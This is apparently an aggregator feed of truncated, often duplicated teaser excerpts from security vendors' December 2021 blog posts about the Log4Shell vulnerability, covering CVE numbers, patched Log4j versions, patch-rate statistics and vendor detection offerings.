By: Sébastien Dudek Dec 23, 2021 Read time: ( words)
Save to Folio
Since its disclosure on Dec. 9, a vast number of articles have been written on the remote code execution (RCE) vulnerability in the library Apache Log4j — a reflection of its impact. The library is used by innumerable programs to easily release log statements without modifying the code. This means that it has an expansive attack surface, with Amazon, Apple, Cloudflare, Google, Tencent, Twitter, and many ot
Trendmicro
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
blogs_trendmicro·2021-12-23
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
Exploits & Vulnerabilities
# Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
In this entry we look into how Log4j vulnerabilities affect devices or properties embedded in or used for connected cars, specifically chargers, in-vehicle infotainment systems, and digital remotes for opening cars.
By: Sébastien Dudek
2021/12/23
Read time: ( words)
Save to Folio
Since its disclosure on Dec. 9, a vast number of articles have been written on the remote code execution (RCE) vulnerability in the library Apache Log4j — a reflection of its impact. The library is used by innumerable programs to easily release log statements without modifying the code. This means that it has an expansive attack surface, with Amazon, Apple, Cloudflare, Google, Tencent, Twitter, and many other
Trendmicro
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
blogs_trendmicro·2021-12-23
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
Exploits & Vulnerabilities
## Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
In this entry we look into how Log4j vulnerabilities affect devices or properties embedded in or used for connected cars, specifically chargers, in-vehicle infotainment systems, and digital remotes for opening cars.
By: Sébastien Dudek Dec 23, 2021 Read time: ( words)
Save to Folio
Since its disclosure on Dec. 9, a vast number of articles have been written on the remote code execution (RCE) vulnerability in the library Apache Log4j — a reflection of its impact. The library is used by innumerable programs to easily release log statements without modifying the code. This means that it has an expansive attack surface, with Amazon, Apple, Cloudflare, Google, Tencent, Twitter, and many oth
Trendmicro
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
blogs_trendmicro·2021-12-23
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
Ausnutzung von Schwachstellen
## Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
In this entry we look into how Log4j vulnerabilities affect devices or properties embedded in or used for connected cars, specifically chargers, in-vehicle infotainment systems, and digital remotes for opening cars.
By: Sébastien Dudek Dec 23, 2021 Read time: ( words)
Save to Folio
Since its disclosure on Dec. 9, a vast number of articles have been written on the remote code execution (RCE) vulnerability in the library Apache Log4j — a reflection of its impact. The library is used by innumerable programs to easily release log statements without modifying the code. This means that it has an expansive attack surface, with Amazon, Apple, Cloudflare, Google, Tencent, Twitter, and many
Tenable
Assess Log4Shell Like an Attacker With Tenable’s Dynamic Detections
blogs_tenable·2021-12-21
Assess Log4Shell Like an Attacker With Tenable’s Dynamic Detections
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Wiz
Log4Shell: Wrap all your Log4j fixes before the holidays | Wiz Blog
blogs_wiz·2021-12-21·CVSS 10.0
CVE-2021-44832 [CRITICAL] Log4Shell: Wrap all your Log4j fixes before the holidays | Wiz Blog
December 28, 2021 update - CVE-2021-44832, a new Log4j vulnerability
On December 28, 2021, Apache released new log4j version 2.17.1 to address CVE-2021-44832, a new remote code execution vulnerability affecting log4j 2.0-alpha7 - 2.17.0 excluding 2.3.2 and 2.12.4 versions. Wiz detects CVE-2021-44832.
The vulnerability severity is 6.6 as the exploit applies only if the attacker can modify the log4j configuration file.
Therefore, Wiz recommends focusing on patching workloads vulnerable to CVE-2021-44228 (the original log4shell) first , as it's easier to exploit and heavily exploited in the wild.
Ever since Log4Shell came into our lives, the internet has been flooded with daily Log4Shell CVEs updates, Log4j releases, as well as outdated recommendations and discredited mitigations. With all
Fortinet
Critical Apache Log4j Vulnerability Updates | FortiGuard Labs
blogs_fortinet·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] Critical Apache Log4j Vulnerability Updates | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Critical Apache Log4j Vulnerability Updates
By Shunichi Imano, James Slaughter, and Geri Revay | December 21, 2021
Beginning December 9th, most of the internet-connected world was forced to reckon with a critical new vulnerability discovered in the Apache Log4j framework deployed in countless servers. Officially labeled CVE-2021-44228, but colloquially known as “Log4Shell”, this vulnerability is both trivial to exploit and allows for full remote code execution on a target system. This has earned the vulnerability a CVSS score of 10 – the maximum.
On December 14th, the Apache Software Foundation revealed a second Log4j vulnerability (CVE-2021-45046). It was initially identified as a Denial-of-Service (DoS) vulnerability with a CVSS score of 3.7 and modera
Wiz
Log4Shell: Wrap all your Log4j fixes before the holidays | Wiz Blog
blogs_wiz·2021-12-21·CVSS 10.0
CVE-2021-44832 [CRITICAL] Log4Shell: Wrap all your Log4j fixes before the holidays | Wiz Blog
December 28, 2021 update - CVE-2021-44832, a new Log4j vulnerability
On December 28, 2021, Apache released new log4j version 2.17.1 to address CVE-2021-44832, a new remote code execution vulnerability affecting log4j 2.0-alpha7 - 2.17.0 excluding 2.3.2 and 2.12.4 versions. Wiz detects CVE-2021-44832.
The vulnerability severity is 6.6 as the exploit applies only if the attacker can modify the log4j configuration file.
Therefore, Wiz recommends focusing on patching workloads vulnerable to CVE-2021-44228 (the original log4shell) first, as it's easier to exploit and heavily exploited in the wild.
Ever since Log4Shell came into our lives, the internet has been flooded with daily Log4Shell CVEs updates, Log4j releases, as well as outdated recommendations and discredited mitigations. With all t
Checkpoint
20th December – Threat Intelligence Report
blogs_checkpoint·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] 20th December – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 20th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 20th December, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research has reported that an Iranian threat group commonly associated with the local regime, “Charming Kitten”, has been attempting to exploit the Log4j vulnerability against 7 Israeli targets in Government and business sectors.
Check Point IPS provides protection against this threat (Apache Log4j Remote C
Qualys
6 Ways to Quickly Detect a Log4Shell Exploit in Your Environment
blogs_qualys·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] 6 Ways to Quickly Detect a Log4Shell Exploit in Your Environment
## Table of Contents
How the Exploit Works
Key Points
Prevent Future Attacks
Free 30 Days of Qualys Multi-Vector EDR
In recent days, the cybersecurity industry has been rapidly assessing the full impact of the Log4Shell (CVE-2021-44228 and CVE-2021-45046) vulnerability. Many organizations are quickly trying to figure out whether this vulnerability is within their environment, and where. The next question a security operations team will ask is if its presence has been exploited. This is critical to answer quickly given Log4Shell’s high severity, the pervasiveness of Java, and its ease of exploitation.
## Free Trial
## Get 30 Days of Qualys Multi-Vector EDR Free
In a previous blog we discussed how to mitigate the threat of this vulnerability via a patch or configuration change. Now l
Wiz
Log4Shell 10 days later: Enterprises halfway through patching | Wiz Blog
blogs_wiz·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4Shell 10 days later: Enterprises halfway through patching | Wiz Blog
Ten days after the critical vulnerability called Log4Shell (CVE-2021-44228) first set the Internet ablaze, organizations are almost halfway through remediating the issue in their cloud environments. See the full technical details here .
Wiz and EY (Ernest & Young) analyzed more than 200 enterprise cloud environments with thousands of cloud accounts. The results were striking: While 93% of all cloud environments are at risk from Log4Shell, on average organizations have patched 45% of their vulnerable cloud resources by Day 10 (December 20, 2021). Note that while our data only accounts for Log4Shell in cloud environments, this vulnerability also affects on-premise networks.
To give organizations a benchmark for their own efforts, we calculated the average patch rate of organizations in eac
Securelist
Answering Log4Shell-related questions
blogs_securelist·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] Answering Log4Shell-related questions
Table of Contents
Important notice
A summary of the Log4Shell situation
The Log4Shell vulnerability webinar FAQ
Authors
Kaspersky
## Important notice
On December 18th, Log4j version 2.17.0 was released to address open vulnerabilities. It is highly recommended to update your systems as soon as possible.
History of the Log4j library vulnerabilities
CVE-2021-44228 (initial vulnerability) – partially fixed in 2.15.0
CVE-2021-45046 (present in Log4j 2.15.0) – fixed in 2.16.0
CVE-2021-45105 (present in Log4j 2.16.0) – fixed in 2.17.0
## A summary of the Log4Shell situation
On December 9th, a Chinese researcher posted his now-monumental discovery on Twitter: there was a Remote Code Execution vulnerability in the popular Apache Log4j library. This library is used in millions of commer
Securelist
Answering Log4Shell-related questions
blogs_securelist·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] Answering Log4Shell-related questions
Table of Contents
- Important notice
- A summary of the Log4Shell situation
- The Log4Shell vulnerability webinar FAQ
Authors
- Kaspersky
## Important notice
On December 18th, Log4j version 2.17.0 was released to address open vulnerabilities. It is highly recommended to update your systems as soon as possible.
History of the Log4j library vulnerabilities
- CVE-2021-44228 (initial vulnerability) – partially fixed in 2.15.0
- CVE-2021-45046 (present in Log4j 2.15.0) – fixed in 2.16.0
- CVE-2021-45105 (present in Log4j 2.16.0) – fixed in 2.17.0
## A summary of the Log4Shell situation
On December 9th, a Chinese researcher posted his now-monumental discovery on Twitter: there was a Remote Code Execution vulnerability in the popular Apache Log4j library. This library is used in million
Wiz
Log4Shell 10 days later: Enterprises halfway through patching | Wiz Blog
blogs_wiz·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4Shell 10 days later: Enterprises halfway through patching | Wiz Blog
Ten days after the critical vulnerability called Log4Shell (CVE-2021-44228) first set the Internet ablaze, organizations are almost halfway through remediating the issue in their cloud environments. See the full technical details here.
Wiz and EY (Ernest & Young) analyzed more than 200 enterprise cloud environments with thousands of cloud accounts. The results were striking: While 93% of all cloud environments are at risk from Log4Shell, on average organizations have patched 45% of their vulnerable cloud resources by Day 10 (December 20, 2021). Note that while our data only accounts for Log4Shell in cloud environments, this vulnerability also affects on-premise networks.
To give organizations a benchmark for their own efforts, we calculated the average patch rate of organizations in each
Qualys
New Options Profiles for Log4Shell Detection | Qualys
blogs_qualys·2021-12-20
New Options Profiles for Log4Shell Detection | Qualys
#### Table of Contents
- Importing Option Profiles
- Search Lists
We have now added two new option profiles to our library for Log4Shell vulnerabilities. Option profiles define the settings you want to use for your scan. These new option profiles are tuned to quickly detect the Log4Shell vulnerability on assets in your environment.
The following two pre-configured option profiles are now available in the library to help you get started:
1. Log4Shell – Authenticated Scan
2. Log4Shell – Unauthenticated Scan
You can import these profiles into your account and use them as-is or edit them as needed.
## Importing Option Profiles
To import our option profiles, go to Scans > Option Profiles > New and select Import from Library.
Choose from the Log4Shell – Authenticated Scan or Log4Shell –
Qualys
6 Ways to Quickly Detect a Log4Shell Exploit in Your Environment | Qualys
blogs_qualys·2021-12-20·CVSS 10.0
CVE-2021-44228 [CRITICAL] 6 Ways to Quickly Detect a Log4Shell Exploit in Your Environment | Qualys
#### Table of Contents
- How the Exploit Works
- Key Points
- Prevent Future Attacks
- Free 30 Days of Qualys Multi-Vector EDR
In recent days, the cybersecurity industry has been rapidly assessing the full impact of the Log4Shell (CVE-2021-44228 and CVE-2021-45046) vulnerability. Many organizations are quickly trying to figure out whether this vulnerability is within their environment, and where. The next question a security operations team will ask is if its presence has been exploited. This is critical to answer quickly given Log4Shell’s high severity, the pervasiveness of Java, and its ease of exploitation.
#### Free Trial
### Get 30 Days of Qualys Multi-Vector EDR Free
Get the Free Trial
In a previous blog we discussed how to mitigate the threat of this vulnerability via a patch
Qualys
New Options Profiles for Log4Shell Detection
blogs_qualys·2021-12-20
New Options Profiles for Log4Shell Detection
## Table of Contents
Importing Option Profiles
Search Lists
We have now added two new option profiles to our library for Log4Shell vulnerabilities. Option profiles define the settings you want to use for your scan. These new option profiles are tuned to quickly detect the Log4Shell vulnerability on assets in your environment.
The following two pre-configured option profiles are now available in the library to help you get started:
Log4Shell – Authenticated Scan
Log4Shell – Unauthenticated Scan
You can import these profiles into your account and use them as-is or edit them as needed.
## Importing Option Profiles
To import our option profiles, go to Scans > Option Profiles > New and select Import from Library .
Choose from the Log4Shell – Authenticated Scan or Log4Shell – Unauthent
Trendmicro
Are Endpoints at Risk for Log4Shell Attacks?
blogs_trendmicro·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] Are Endpoints at Risk for Log4Shell Attacks?
Ausnutzung von Schwachstellen
## Are Endpoints at Risk for Log4Shell Attacks?
We created a free assessment tool for scanning devices to know whether it is at risk for Log4Shell attacks.
By: Trend Micro Dec 18, 2021 Read time: ( words)
Save to Folio
The end of 2021 saw the emergence of the Log4Shell (CVE-2021-44228) vulnerability, a critical vulnerability in the ubiquitous Java logging package Apache Log4j. Exploiting Log4Shell via crafted log messages can allow an attacker to execute code on remote machines. The potential impact of this vulnerability is great enough that it scores a 10.0 rating based on CVSS version 3.x and a 9.3 rating based on CVSS version 2.0 in terms of critical risk — and it’s easy to see why.
This vulnerability has the potential to have far-reaching consequence
Trendmicro
Are Endpoints at Risk for Log4Shell Attacks
blogs_trendmicro·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] Are Endpoints at Risk for Log4Shell Attacks
Exploits & Vulnerabilities
## Are Endpoints at Risk for Log4Shell Attacks?
We created a free assessment tool for scanning devices to know whether it is at risk for Log4Shell attacks.
By: Trend Micro Dec 18, 2021 Read time: ( words)
Save to Folio
The end of 2021 saw the emergence of the Log4Shell (CVE-2021-44228) vulnerability, a critical vulnerability in the ubiquitous Java logging package Apache Log4j. Exploiting Log4Shell via crafted log messages can allow an attacker to execute code on remote machines. The potential impact of this vulnerability is great enough that it scores a 10.0 rating based on CVSS version 3.x and a 9.3 rating based on CVSS version 2.0 in terms of critical risk — and it’s easy to see why.
This vulnerability has the potential to have far-reaching consequences d
Trendmicro
Are Endpoints at Risk for Log4Shell Attacks
blogs_trendmicro·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] Are Endpoints at Risk for Log4Shell Attacks
Exploits & Vulnerabilities
## Are Endpoints at Risk for Log4Shell Attacks?
We created a free assessment tool for scanning devices to know whether it is at risk for Log4Shell attacks.
By: Trend Micro 2021/12/18 Read time: ( words)
Save to Folio
The end of 2021 saw the emergence of the Log4Shell (CVE-2021-44228) vulnerability, a critical vulnerability in the ubiquitous Java logging package Apache Log4j. Exploiting Log4Shell via crafted log messages can allow an attacker to execute code on remote machines. The potential impact of this vulnerability is great enough that it scores a 10.0 rating based on CVSS version 3.x and a 9.3 rating based on CVSS version 2.0 in terms of critical risk — and it’s easy to see why.
This vulnerability has the potential to have far-reaching consequences due
Trendmicro
Are Endpoints at Risk for Log4Shell Attacks
blogs_trendmicro·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] Are Endpoints at Risk for Log4Shell Attacks
Exploits & Vulnerabilities
# Are Endpoints at Risk for Log4Shell Attacks?
We created a free assessment tool for scanning devices to know whether it is at risk for Log4Shell attacks.
By: Trend Micro
2021/12/18
Read time: ( words)
Save to Folio
The end of 2021 saw the emergence of the Log4Shell (CVE-2021-44228) vulnerability, a critical vulnerability in the ubiquitous Java logging package Apache Log4j. Exploiting Log4Shell via crafted log messages can allow an attacker to execute code on remote machines. The potential impact of this vulnerability is great enough that it scores a 10.0 rating based on CVSS version 3.x and a 9.3 rating based on CVSS version 2.0 in terms of critical risk — and it’s easy to see why.
This vulnerability has the potential to have far-reaching consequences due
Trendmicro
Are Endpoints at Risk for Log4Shell Attacks?
blogs_trendmicro·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] Are Endpoints at Risk for Log4Shell Attacks?
Exploits y vulnerabilidades
## Are Endpoints at Risk for Log4Shell Attacks?
We created a free assessment tool for scanning devices to know whether it is at risk for Log4Shell attacks.
By: Trend Micro Dec 18, 2021 Read time: ( words)
Save to Folio
The end of 2021 saw the emergence of the Log4Shell (CVE-2021-44228) vulnerability, a critical vulnerability in the ubiquitous Java logging package Apache Log4j. Exploiting Log4Shell via crafted log messages can allow an attacker to execute code on remote machines. The potential impact of this vulnerability is great enough that it scores a 10.0 rating based on CVSS version 3.x and a 9.3 rating based on CVSS version 2.0 in terms of critical risk — and it’s easy to see why.
This vulnerability has the potential to have far-reaching consequences
Trendmicro
Are Endpoints at Risk for Log4Shell Attacks?
blogs_trendmicro·2021-12-18·CVSS 10.0
CVE-2021-44228 [CRITICAL] Are Endpoints at Risk for Log4Shell Attacks?
Sfruttamento vulnerabilità
## Are Endpoints at Risk for Log4Shell Attacks?
We created a free assessment tool for scanning devices to know whether it is at risk for Log4Shell attacks.
By: Trend Micro Dec 18, 2021 Read time: ( words)
Save to Folio
The end of 2021 saw the emergence of the Log4Shell (CVE-2021-44228) vulnerability, a critical vulnerability in the ubiquitous Java logging package Apache Log4j. Exploiting Log4Shell via crafted log messages can allow an attacker to execute code on remote machines. The potential impact of this vulnerability is great enough that it scores a 10.0 rating based on CVSS version 3.x and a 9.3 rating based on CVSS version 2.0 in terms of critical risk — and it’s easy to see why.
This vulnerability has the potential to have far-reaching consequences d
Trendmicro
This Week in Security News - December 17, 2021
blogs_trendmicro·2021-12-17
This Week in Security News - December 17, 2021
# This Week in Security News - December 17, 2021
This week, read on Purple Fox’s infection chain observed by Trend Micro’s Managed XDR. Also, learn about the Log4j vulnerability that has the potential to cause ‘incalculable’ damage.
By: Jon Clay
2021/12/17
Read time: ( words)
Save to Folio
Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, read on Purple Fox’s infection chain observed by Trend Micro’s Managed XDR. Also, learn about the Log4j vulnerability that has the potential to cause ‘incalculable’ damage.
Read on:
A Look into Purple Fox’s Server Infrastructure
In this blog, Trend Micro sheds light on the later stages of Purple Fox’s infection chain observed via Trend Micro’s Ma
Tenable
CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabilities
blogs_tenable·2021-12-17·CVSS 7.5
[HIGH] CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabilities
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Management (CSPM)
Compliance
Cyber insurance
Data Security Posture Management (DSPM)
Google Cloud security
Infrastructure as Code (IaC) security
Kubernetes Security Pos
Zscaler
Weekly Roundup: What We’ve Learned About the Log4j Vulnerability | Zscaler
blogs_zscaler·2021-12-17·CVSS 10.0
[CRITICAL] Weekly Roundup: What We’ve Learned About the Log4j Vulnerability | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Qualys
Log4Shell Log4j Vulnerability Test | CVE-2021-45046 Detection | Qualys
blogs_qualys·2021-12-15·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4Shell Log4j Vulnerability Test | CVE-2021-45046 Detection | Qualys
#### Table of Contents
- About CVE-2021-44228
- Detecting the Vulnerability with Qualys WAS
- WAS Log4Shell Detection Methodology with Qualys Periscope
- Scan Configurations :
- About CVE-2021-45046
- About CVE-2021-44832
- Solution
- Credits
- References:
- Contributors
On December 09, 2021, a critical remote code execution vulnerability was identified in Apache Log4j2 after proof-of-concepts were leaked publicly, affecting Apache Log4j 2.x <= 2.15.0-rc1. The vulnerability is being tracked as CVE-2021-44228 with CVSSv3 10 score and affects numerous applications which are using the Log4j2 library.
#### Free Trial
### Quickly Identify Your Vulnerable Web Applications Using Our Cloud Platform
Get the Free Trial
Successful exploitation of this vulnerability could allow a remote attacker
Qualys
Is Your Web Application Exploitable By Log4Shell Vulnerability?
blogs_qualys·2021-12-15·CVSS 10.0
CVE-2021-44228 [CRITICAL] Is Your Web Application Exploitable By Log4Shell Vulnerability?
## Table of Contents
About CVE-2021-44228
Detecting the Vulnerability with Qualys WAS
WAS Log4Shell Detection Methodology with Qualys Periscope
Scan Configurations :
About CVE-2021-45046
About CVE-2021-44832
Solution
Credits
References:
Contributors
On December 09, 2021, a critical remote code execution vulnerability was identified in Apache Log4j2 after proof-of-concepts were leaked publicly, affecting Apache Log4j 2.x <= 2.15.0-rc1. The vulnerability is being tracked as CVE-2021-44228 with CVSSv3 10 score and affects numerous applications which are using the Log4j2 library.
## Free Trial
## Quickly Identify Your Vulnerable Web Applications Using Our Cloud Platform
Successful exploitation of this vulnerability could allow a remote attacker to download and execute arbitrary c
Zscaler
ThreatLabz analysis - Log4Shell CVE-2021-44228 Exploit Attempts | Zscaler
blogs_zscaler·2021-12-15·CVSS 10.0
[CRITICAL] ThreatLabz analysis - Log4Shell CVE-2021-44228 Exploit Attempts | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Trendmicro
Vulnerabilidad Log4j/Log4Shell
blogs_trendmicro·2021-12-15·CVSS 10.0
CVE-2021-44228 [CRITICAL] Vulnerabilidad Log4j/Log4Shell
## Vulnerabilidad Log4j/Log4Shell
En Trend Micro hemos efectuado un esfuerzo importante para ayudar a nuestros clientes a protegerse frente a cualquier amenaza que intente aprovechar la vulnerabilidad Log4j (Log4Shell)
By: José de la Cruz Dec 15, 2021 Read time: ( words)
Save to Folio
A raíz de la alerta de seguridad publicada el pasado día 9 de diciembre relacionada con el descubrimiento de una nueva vulnerabilidad en una librería de Apache (CVE-2021-44228), desde Trend Micro hemos efectuado un esfuerzo considerable para ayudar a nuestros clientes a protegerse frente a cualquier amenaza que intente aprovecharla.
Log4shell está afectando de forma crítica a todo tipo de entornos productivos tanto en el ámbito TI como en los entornos industriales / OT, además lo crítico de esta vulnerab
Checkpoint
StealthLoader Malware Leveraging Log4Shell
blogs_checkpoint·2021-12-15·CVSS 10.0
CVE-2021-44228 [CRITICAL] StealthLoader Malware Leveraging Log4Shell
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## StealthLoader Malware Leveraging Log4Shell
Introduction
While monitoring the exploit activity, Check Point Research detected many attacks involving the mining of cryptocurrencies.
While most miners detected are Linux based, Check Point researchers recently discovered a Win32 executable malware identified as StealthLoader. This .NET-based malware surfaced right after the Log4j vulnerability was discovered.
The StealthLoader Trojan performs various evasion techniques in order to avoid detection while using the v
Zscaler
Identity-based segmentation neutralizes Apache Log4j exploit
blogs_zscaler·2021-12-14
Identity-based segmentation neutralizes Apache Log4j exploit
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Tenable
Log4Shell: 5 Steps The OT Community Should Take Right Now
blogs_tenable·2021-12-14
Log4Shell: 5 Steps The OT Community Should Take Right Now
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Management (CSPM)
Compliance
Cyber insurance
Data Security Posture Management (DSPM)
Google Cloud security
Infrastructure as Code (IaC) security
Kubernetes Security Pos
Qualys
Secure Against Log4Shell Exploits Using Qualys Multi-Vector EDR | Qualys
blogs_qualys·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] Secure Against Log4Shell Exploits Using Qualys Multi-Vector EDR | Qualys
#### Table of Contents
- Prevalence
- Likelihood of exploitation by malware and APT groups
- Identify Risk Exposure
- Scan and Identify Exploits and Malware
- Prevent future attacks
- Free 30 Days of Qualys Multi-Vector EDR
Author: Hiep Dang & Malware Threat Research Team
On Dec 9, 2021, the world first learned about the Log4Shell vulnerability (aka Log4J CVE-2021-44228) found in the Log4j2 library commonly used by Java applications. Since then, everyone in the cybersecurity industry has been scrambling to understand the full impact of the vulnerability and future implications of threats and exploits. It will be months before we understand the total fallout. Here is what we know (for now) about the prevalence of the vulnerability and what you can do to prevent, detect, and respond to em
Qualys
Log4Shell Exploit Detection and Response with Qualys Multi-Vector EDR
blogs_qualys·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4Shell Exploit Detection and Response with Qualys Multi-Vector EDR
## Table of Contents
Prevalence
Likelihood of exploitation by malware and APT groups
Identify Risk Exposure
Scan and Identify Exploits and Malware
Prevent future attacks
Free 30 Days of Qualys Multi-Vector EDR
Author: Hiep Dang & Malware Threat Research Team
On Dec 9, 2021, the world first learned about the Log4Shell vulnerability (aka Log4J CVE-2021-44228 ) found in the Log4j2 library commonly used by Java applications. Since then, everyone in the cybersecurity industry has been scrambling to understand the full impact of the vulnerability and future implications of threats and exploits. It will be months before we understand the total fallout. Here is what we know (for now) about the prevalence of the vulnerability and what you can do to prevent, detect, and respond to emerging t
Checkpoint
The Laconic Log4Shell FAQ
blogs_checkpoint·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] The Laconic Log4Shell FAQ
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## The Laconic Log4Shell FAQ
## What is Log4Shell (CVE-2021-44228)?
A Remote Code Execution vulnerability in log4j2, a popular logging framework used in Java applications.
## What does th
Checkpoint
13th December – Threat Intelligence Report
blogs_checkpoint·2021-12-13
CVE-2021-44228 13th December – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 13th December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th December, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research warns of potential ransomware attacks as samples of Emotet are fast-spreading via Trickbot. Since the Emotet takedown 10 months ago, CPR has spotted over 140,000 victims of Trickbot, across 149 countries, which might now be converted into Emotet, providing ransomware gangs a backdoor into compromise
Trendmicro
Jetzt Patchen: Log4Shell wird aktiv missbraucht
blogs_trendmicro·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] Jetzt Patchen: Log4Shell wird aktiv missbraucht
Ausnutzung von Schwachstellen
## Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Log4Shell, also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.
